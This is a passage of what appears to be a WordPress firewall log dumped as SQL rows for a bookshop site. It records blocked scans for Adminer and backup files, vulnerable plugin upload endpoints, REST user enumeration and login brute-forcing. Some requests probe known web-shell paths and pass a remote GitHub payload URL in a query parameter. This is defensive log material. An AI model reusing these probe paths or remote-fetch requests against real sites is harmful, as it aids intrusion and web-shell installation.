Firefox\\/72.0\"}','edb5XfVxNsvUtqLr8IpQHugR',0,1636554959.0275,980,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/uploads/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','6Idzh1RJVwOHvuFnW8lpq7TA',0,1636554959.7232,442,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/adminer/adminer-4.7.0.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','iDQyZvHaPId5xLCJhpWcOmM2',0,1636554960.5045,383,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','HXrQC2VAZWfiw7z6UKYxuIRN',0,1636554960.9970,244,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/upload/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','VpacrW8KqCDeOdgGNQH3o4Im',0,1636554960.0180,1665,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/adminer/inc/editor/index.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','Engyz1a8q3H2VL0CS4MAJUNG',0,1636554961.5555,652,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/uploads/adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','prjASutMa1oGQnwXFsYcZhDg',0,1636554961.9581,598,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/_adminer.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','cgCeqEL7k6imWS2XR3MxVO9w',0,1636554962.5042,315,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/mirasvit_adminer_mysql.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','X3DscR0d7o5AmYaUK98zE2Vt',0,1636554962.8513,940,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/mirasvit_adminer_425.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','vt1a5b2AXsdTJkRqeVDnGwz7',0,1636554963.4601,970,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/adminer1.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','YcKUgI8LnRewdqWEuP1DH9O4',0,1636554964.3946,262,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/adminer/index.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','P8L2BXsMnFevQSNhwJZztGjW',0,1636554964.0228,1164,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/mirasvit_adminer_431.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','jmosKMlTC9qgWND4eSVYyXGc',0,1636554965.1815,1355,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/mirasvit_adminer-4.2.3.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','g6WxHkSTMo0ZlcBjvdXfG1Nw',0,1636554966.3472,1191,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/adminer-4.6.2-cs.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','iOrt2FEDmwvc0Gs3RH1IoxW4',0,1636554966.9794,858,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/adminer-4.5.0.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','74lDqzVMZRk9Qb8WfeCuiOpT',0,1636554967.1429,773,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/adminer-4.3.0.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','dU3iSBPkabvZr6XYVsfO92o0',0,1636554967.8310,897,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/latest.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','FcBDntS0XiUs5VfZvPyzM1wQ',0,1636554968.1876,865,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/latest-mysql.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','tDEl4JVWkxRKq0CYd6ZNTuAI',0,1636554970.5646,959,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/latest-en.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','H7fKlXSI3U6Y1rPxv4wtCnGj',0,1636554970.3930,1258,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/latest-mysql-en.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','xAsnYR0VOrNH1JowB63FcEqX',0,1636554971.0259,716,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/adminer-4.7.0.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/72.0\"}','2IXvTy5cGKu0jO1eo86zHktQ',0,1636554971.5454,860,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/?gf_page=upload','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','hDUfpbWN1axoIFkXEA07wLlm',0,1636554979.5590,388,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/formcraft/file-upload/server/content/upload.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','tFluNVq3hCKk4jsRLfEYiarx',0,1636555050.7510,1107,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-json/wp/v2/posts/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','Y6FRwSjuNxbToZUIWVcaBvEf',0,1636555083.0425,1206,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-json/wp/v2/posts/None','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko\\/20100101 Firefox\\/64.0\"}','rRm2VQ5qM8kxzDvtfi4w93XK',0,1636555086.9818,856,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/hd-webplayer/playlist.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','yP1r4Vg0SGwm65xqEhjO8Jik',0,1636555103.5694,920,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-content/plugins/viral-optins/api/uploader/file-uploader.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','TPvoG5thNaYnlVWr9iU2SAJR',0,1636555133.5870,308,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wordpress/wp-admin/setup-config.php?step=0','','{\"1\":\"python-requests\\/2.26.0\"}','ACY7FiZejGlvM8wfcPp5WTE4',0,1636555140.1897,890,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp/wp-admin/setup-config.php?step=0','','{\"1\":\"python-requests\\/2.26.0\"}','stlrbN6wEYBufxvkSmK2InJq',0,1636555143.3008,1154,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/blog/wp-admin/setup-config.php?step=0','','{\"1\":\"python-requests\\/2.26.0\"}','lfJwtXZMLzpBEKsvPdq3Sjyh',0,1636555146.5997,1063,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/test/wp-admin/setup-config.php?step=0','','{\"1\":\"python-requests\\/2.26.0\"}','2GxZAehobwOHmrdiKt7yLBEY',0,1636555150.5235,1377,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/site/wp-admin/setup-config.php?step=0','','{\"1\":\"python-requests\\/2.26.0\"}','1HEU5wodsNKOqDBjxWzQ3cml',0,1636555154.2113,1244,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','UI7qcFHlfwiRD49jv1z62YAs',0,1636555157.5034,665,'','GET',403,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-json/wp/v2/users/1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','H97rLKQIoBx2lhwJG10yMaq3',0,1636555188.9205,590,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-json/wp/v2/users/2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','Qso7GMjxa3Vqrh0iRNzPbucI',0,1636555191.1640,1401,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-json/wp/v2/users/3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','DZc0pTqHzmjrbtFV95Uy2YBQ',0,1636555194.3654,397,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-json/wp/v2/users/4','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','sH6WoQg0d8Vwrx5fy7qOAhpn',0,1636555196.4115,662,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-json/wp/v2/users/5','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','iOVyX3xMUAu2RT4Bf7NtzZn5',0,1636555198.8104,573,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-json/wp/v2/users/6','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','AMUsgoapyqSOwW0DT6LkGmX7',0,1636555201.3867,663,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-json/wp/v2/users/7','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','v8g2aXIbQrpuM7iSsm0kyB6V',0,1636555204.2720,688,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-json/wp/v2/users/8','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','CNnxPqolcyuIZzhEKms2S4LA',0,1636555206.3274,668,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-json/wp/v2/users/9','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','ruS9OzK53fpWnZh2bdjCtGyo',0,1636555208.3943,709,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-json/wp/v2/users/10','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','GW36jp2MkCDEAZ5vKYg1TLiz',0,1636555210.6608,879,'','GET',403,0,520,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','ubtyfOR3NXvo8SJHnAqPph74',0,1636555219.5870,1014,'','GET',404,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','g6edlRc8knvIHXbYx3VQrSfa',0,1636555219.9979,740,'','GET',404,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','iIA48kzldSZOoDpTe07J2nsY',0,1636555220.2182,907,'','GET',404,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','CnSi3rR09QksTMg7D8cBZ2dw',0,1636555219.7788,1347,'','GET',404,0,700,0,1,'',0),('20.115.120.54',343111734,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','0N8T6LQErpbScZvXReduKHOj',0,1636555220.2240,1325,'','GET',404,0,700,0,1,'',0),('111.231.206.201',1877462729,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','5RbBkgeWs4qp8vZrlAIwCaFM',0,1636555626.3579,636,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','8xhqBW72In9KROlZbDXjit5f',0,1636562395.7179,249,'','POST',403,0,600,0,1,'',0),('91.176.123.228',1538292708,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','mOJB628NgW1f7sUkQM3cDujA',0,1636570793.0226,425,'','POST',403,0,600,0,1,'',0),('186.179.100.93',3132318813,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','uleoQ9cdTx3LWqFs76Mbn0Dr',0,1636570803.0639,442,'','POST',403,0,600,0,1,'',0),('200.241.39.37',3371247397,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','4fh6XrxLetM0UzHVIab7B31F',0,1636571019.7957,555,'','POST',403,0,600,0,1,'',0),('138.207.154.32',2328861216,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','TSljrOkcqfm9i60EBNvGWAeV',0,1636571163.0888,442,'','POST',403,0,600,0,1,'',0),('119.46.166.118',1999545974,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','NDzVt1T75KJkyE84bPdwYHXM',0,1636571274.7095,674,'','POST',403,0,600,0,1,'',0),('190.3.205.213',3187920341,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp-login.php\"}','IYWQ6dHET1ChAZ20PGFKe4L3',0,1636571337.4057,461,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','u9hAX8wYPHdDWliybazNxoM3',0,1636573011.8644,465,'','POST',403,0,600,0,1,'',0),('104.37.84.5',1747276805,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','mTOQVukjUw0z8nFG5bEKCcS7',0,1636581190.8860,501,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','HDjMhEywmBtuAeGFfc9P8OZC',0,1636583606.4868,505,'','POST',403,0,600,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FOxKoTAm96tBvLEn3kgNDeJc',0,1636587266.8500,435,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','fltiSqZgYmvGwbX7cAdr5QnF',0,1636587270.4513,423,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3o1hZeDGtfibIqTBVFNAvau2',0,1636587275.5302,424,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6kFDW5pLEBjedrOCTfbUx4qS',0,1636587281.3146,458,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','691MCOKfIGhkVFw3rvgnRbyX',0,1636587296.6211,431,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','h4frEkH1LAenaIW5g9YMlyXu',0,1636587300.6558,421,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','aFdjrKQtqnsHRDW5bmuw1lpE',0,1636587305.1755,467,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mLZ0FQxpRATgG7yKUuv4zCeM',0,1636587309.7169,422,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JnS9tjKLzkUTcg34vdIrWXuR',0,1636587320.3607,426,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','D1Wu7MI6sfvEtcG8Cq2ObUlA',0,1636587325.1751,404,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OAK6WQk1EBawiopfdz9Tmn7S',0,1636587330.0750,574,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ENSI1HOxXjgpomP9h5DQlBYb',0,1636587334.1249,383,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4LZGvDuhA5poYjkSB7cRsfqP',0,1636587337.8215,415,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LGaSArElFsHU09zo7pIPMwnc',0,1636587341.9626,407,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','t74hGwVATqE1pvmg8LJsI2Nd',0,1636587346.6015,401,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0rxADtBn4f5Pg1dSuh2OKjFw',0,1636587350.5268,433,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9aVP0SK8JIDerlyuTOXito26',0,1636587355.3402,390,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZoLb1riFv8XzhckIfNxMdHP2',0,1636587359.8905,446,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','MwqA6uzXo7H4R50UYW3mFjtT',0,1636587364.5165,399,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','D4RYBJ9rEqIwNtZV5hWbKoLx',0,1636587369.8072,400,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3Cl0ztaZEfmY1oribgVQcF4x',0,1636587374.0945,443,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Du1CtAoMK54YpWZUnEFwLqJO',0,1636587378.3932,412,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6f1bMezFC7kT3HLZmJSuXoP0',0,1636587384.2293,702,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 